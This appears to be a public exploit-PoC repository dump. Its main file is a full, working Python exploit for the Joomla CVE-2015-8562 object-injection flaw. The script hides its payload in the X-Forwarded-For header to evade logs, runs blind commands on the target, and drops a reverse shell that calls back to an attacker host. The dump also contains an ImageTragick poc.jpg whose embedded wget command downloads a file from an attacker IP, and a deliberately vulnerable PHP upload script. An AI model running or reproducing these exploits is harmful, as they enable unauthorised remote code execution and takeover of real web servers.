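#!/usr/bin/env python
#
# Repository layout (from the listing that heads this page):
#   ├── CVE-2015-8562
#   │   └── joomla-rce.py
#   ├── CVE-2016-3714
#   │   ├── index.html
#   │   ├── poc.jpg
#   │   └── upload.php
#   ├── LICENSE
#   └── README.md
#
# --------------------------------------------------------------------------------
# /CVE-2015-8562/joomla-rce.py:
# --------------------------------------------------------------------------------

# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
# Date: 12/17/2015
# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
# Vendor Homepage: https://www.joomla.org/
# Software Link: http://joomlacode.org/gf/project/joomla/frs/
# Version: Joomla 1.5 - 3.4.5
# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
# CVE : CVE-2015-8562


'''
Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE

Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):
https://www.exploit-db.com/exploits/38977/

Vulnerability Info, Exploit, Detection:
https://breakpoint-labs.com/joomla-rce-cve-2015-8562/

Exploit modified to send the payload in the "X-Forwarded-For" header instead
of "User-Agent": the default Apache access.log format records the User-Agent
but not X-Forwarded-For. Caveats for operators and defenders alike: a reverse
proxy / load balancer in front of the target, or a custom LogFormat with
%{X-Forwarded-For}i, still records the header, and the serialized payload is
stored in the target's session data either way. This is log evasion, not
stealth.

NOTE(review): public analyses of CVE-2015-8562 report that the chain does not
fire on PHP builds that hardened session unserialize() (reportedly
>= 5.4.45 / 5.5.29 / 5.6.13) -- confirm the target's PHP version before
treating a silent result as "not vulnerable".

Usage - Automate Blind RCE:
    python joomla-rce.py -t http://192.168.1.139/ --cmd
    $ touch /tmp/newhnewh

Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:
    python joomla-rce.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444
    [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/
    [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444

    [+] Spawning reverse shell....

    Listening on [0.0.0.0] (family 0, port 4444)
    $ python -c "import pty;pty.spawn('/bin/bash')"
    www-data@ubuntu:/$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@ubuntu:/$

Only use against systems you are authorised to test.
'''

from __future__ import print_function

import argparse
import base64
import subprocess
import sys
import time

# "requests" (third-party) is imported inside get_url() rather than here, so
# the pure payload builders (php_str_noquotes, generate_payload, ...) can be
# imported -- e.g. to derive detection signatures or run tests -- on a host
# without requests installed. Only the network paths need it.

try:  # Python 2: raw_input() returns the line as-is; input() would eval() it
    read_line = raw_input  # noqa: F821
except NameError:  # Python 3: input() is the non-evaluating reader
    read_line = input

# Seconds to wait on each HTTP request. The original PoC used no timeout, so a
# target that accepted the connection and never answered hung the tool forever.
REQUEST_TIMEOUT = 30

# How many times the poisoned session is replayed once a cookie is held
# (kept from the original PoC).
REPLAY_COUNT = 3

# Where stage 1 drops the Python reverse shell on the target. A fixed,
# world-readable path under /tmp is an obvious forensic artifact (and can be
# pre-created by another local user) -- acceptable for a PoC, not for an op.
REMOTE_SHELL_PATH = "/tmp/newhnewh.py"

# Benign-looking mobile User-Agent. The malicious bytes go only in
# X-Forwarded-For; this UA is what the default access.log will show.
USER_AGENT = ('Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) '
              'AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 '
              'Mobile/9A334 Safari/7534.48.3')


# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
def get_url(url, user_agent):
    """Deliver *user_agent* (the serialized payload) to *url* via X-Forwarded-For.

    A first request obtains a session cookie; the same headers are then
    replayed REPLAY_COUNT times with that cookie so the server reads back
    and unserialize()s the poisoned session data. Returns the last
    requests.Response. Network errors (requests.RequestException) propagate,
    as in the original PoC; callers decide whether to report or abort.
    """
    import requests  # third-party; deferred so the pure helpers import without it

    headers = {
        'User-Agent': USER_AGENT,
        # Payload rides in X-Forwarded-For instead of User-Agent (see the
        # module docstring). Both headers were used by the original and the
        # modified PoC, i.e. Joomla stores both in the session.
        'x-forwarded-for': user_agent,
    }
    cookies = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT).cookies

    # The collapsed original is ambiguous about whether `return` sat inside
    # the loop; the upstream exploit-db PoC returns after all replays, which
    # is what is done here.
    response = None
    for _ in range(REPLAY_COUNT):
        response = requests.get(url, headers=headers, cookies=cookies,
                                timeout=REQUEST_TIMEOUT)
    return response


def php_str_noquotes(data):
    """Encode *data* as a PHP expression ``chr(N).chr(N)...`` containing no quotes.

    The PHP code is embedded inside a double-quoted serialized string, so any
    quote character in it would corrupt the serialization; every character is
    therefore emitted as a chr() call joined with PHP's ``.`` operator.
    Returns "" for empty input.
    """
    return ".".join("chr({0})".format(ord(char)) for char in data)


def generate_payload(php_payload):
    """Wrap *php_payload* (PHP source) in the CVE-2015-8562 serialized object graph.

    The PHP code is eval()'d from a chr()-encoded string so it carries no
    quotes; ``JFactory::getConfig();exit`` is appended (kept from the original
    PoC) so the request ends after execution instead of rendering the page.
    Returns the text to send in the X-Forwarded-For header.

    Gadget chain, as far as the serialized structure itself shows: a
    JDatabaseDriverMysqli whose disconnectHandlers holds [SimplePie object,
    "init"]; that SimplePie has cache_name_function = "assert" and feed_url =
    our PHP, so when the handler runs assert() evaluates the code. See the
    Breakpoint Labs write-up (module docstring) for the full analysis.
    """
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))

    # Truncation trigger. Presumably the MySQL 3-byte "utf8" truncation that
    # the CVE-2015-8562 write-ups describe: the session row is cut at this
    # lead byte of a 4-byte (here also malformed) UTF-8 sequence, so what is
    # read back ends on the injected object. On Python 3, http.client sends
    # str header values as latin-1, so these code points still go out as the
    # bytes F0 FD FD FD.
    terminate = '\xf0\xfd\xfd\xfd'

    # NOTE(review): inside these raw strings "\0" is two literal characters
    # (backslash, zero), not a NUL byte, while s:21 / s:13 are the lengths PHP
    # uses for protected properties with real NULs (\0*\0disconnectHandlers).
    # Reproduced byte-for-byte from the original PoC, which the authors report
    # working; confirm against a target before changing anything here.
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{0};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

    return exploit_template


def php_system_call(command):
    """Return PHP source ``system('<command>');`` for a shell *command*.

    Backslashes and single quotes are escaped for PHP's single-quoted string
    syntax. The original PoC interpolated the raw command, so a command
    containing ``'`` produced invalid PHP -- and, the channel being blind,
    no visible error.
    """
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return "system('{0}');".format(escaped)


def reverse_shell_stager(lhost, lport):
    """Build the stage-1 shell command that writes the reverse shell on the target.

    The payload is pentestmonkey's Python reverse-shell one-liner connecting
    back to *lhost*:*lport*. It is base64-encoded because (per the original
    author) some of its characters broke inside the exploit string; the base64
    alphabet is safe inside PHP's single-quoted string and the shell.
    Returns ``echo <b64> | base64 -d > REMOTE_SHELL_PATH``.
    """
    shell_src = (
        "import socket,subprocess,os;"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
        "s.connect(('{0}', {1}));"
        "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
        'p=subprocess.call(["/bin/sh","-i"]);'
    ).format(lhost, lport)
    encoded = base64.b64encode(shell_src.encode("ascii"))
    if not isinstance(encoded, str):  # Python 3 returns bytes; keep str on both
        encoded = encoded.decode("ascii")
    return "echo {0} | base64 -d > {1}".format(encoded, REMOTE_SHELL_PATH)


def blind_rce(rhost):
    """Interactive loop: read a shell command and run it on *rhost* via the exploit.

    There is no output channel (the injected PHP exit()s after system()), so
    results must be observed through side effects -- e.g. ``touch`` a file or
    trigger a DNS/HTTP callback. Ctrl-C or EOF ends the loop.
    """
    print("[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {0}".format(rhost))
    print("[-] Dropping into shell-like environment to perform blind RCE")
    while True:
        try:
            command = read_line('$ ')
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not command.strip():
            continue
        try:
            print(get_url(rhost, generate_payload(php_system_call(command))))
        except Exception as exc:  # network errors from requests; keep the loop alive
            print("[!] request failed: {0}".format(exc))


def reverse_shell(rhost, lhost, lport):
    """Two-stage reverse shell: drop the one-liner, start a listener, execute it."""
    print("[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {0}".format(rhost))
    print("[-] Uploading python reverse shell with LHOST:{0} and LPORT:{1}".format(lhost, lport))
    # Stage 1: write the reverse shell to REMOTE_SHELL_PATH on the target.
    stage1 = reverse_shell_stager(lhost, lport)
    print(get_url(rhost, generate_payload(php_system_call(stage1))))

    # Listener. The original PoC assumed gnome-terminal and raised an OSError
    # before stage 2 on hosts without it; ask the operator instead.
    listener_cmd = "nc -lvp {0}".format(lport)
    try:
        subprocess.Popen(args=["gnome-terminal", "--command=" + listener_cmd])
        time.sleep(1)  # give nc a moment to bind before the callback fires
    except OSError as exc:
        print("[!] could not start gnome-terminal ({0}); run '{1}' yourself".format(exc, listener_cmd))
        read_line("[!] press Enter once the listener is up... ")
    print("[+] Spawning reverse shell....")
    # Stage 2: execute it; the shell connects back to LHOST:LPORT.
    print(get_url(rhost, generate_payload(php_system_call("python " + REMOTE_SHELL_PATH))))


def main():
    """Parse the command line and dispatch to blind-RCE or reverse-shell mode."""
    parser = argparse.ArgumentParser(
        prog='joomla-rce.py',
        description='Automate blind RCE for Joomla vuln CVE-2015-8562')
    parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')
    parser.add_argument('-l', dest='LHOST', help='specify local ip for reverse shell')
    parser.add_argument('-p', dest='LPORT', type=int, help='specify local port for reverse shell')
    parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
    args = parser.parse_args()

    if args.cmd:
        blind_rce(args.RHOST)
    # The original tested `args.LPORT and args.LPORT`, so `-p` alone went on
    # to build a shell that connected back to the host "None".
    elif args.LHOST and args.LPORT:
        reverse_shell(args.RHOST, args.LHOST, args.LPORT)
    else:
        print('[!] missing arguments')
        parser.print_help()
        sys.exit(2)


if __name__ == "__main__":
    main()

# --------------------------------------------------------------------------------
# /CVE-2016-3714/index.html:
# --------------------------------------------------------------------------------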
6 | Select image to upload: 7 | 8 | 9 |
10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /CVE-2016-3714/poc.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://fake-site.com/logo.png"|wget "http://[attacker-ip]:[attacker-port]/[file-name] "-O /tmp/[file-name]")' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /CVE-2016-3714/upload.php: -------------------------------------------------------------------------------- 1 | setImageColorspace(255); 22 | $im->setCompression(Imagick::COMPRESSION_JPEG); 23 | $im->setCompressionQuality(60); 24 | $im->setImageFormat('jpeg'); 25 | 26 | echo "The file ". basename( $_FILES["file"]["name"]). " has been uploaded."; 27 | } 28 | 29 | ?> 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploit-POCs 2 | --------------------------------------------------------------------------------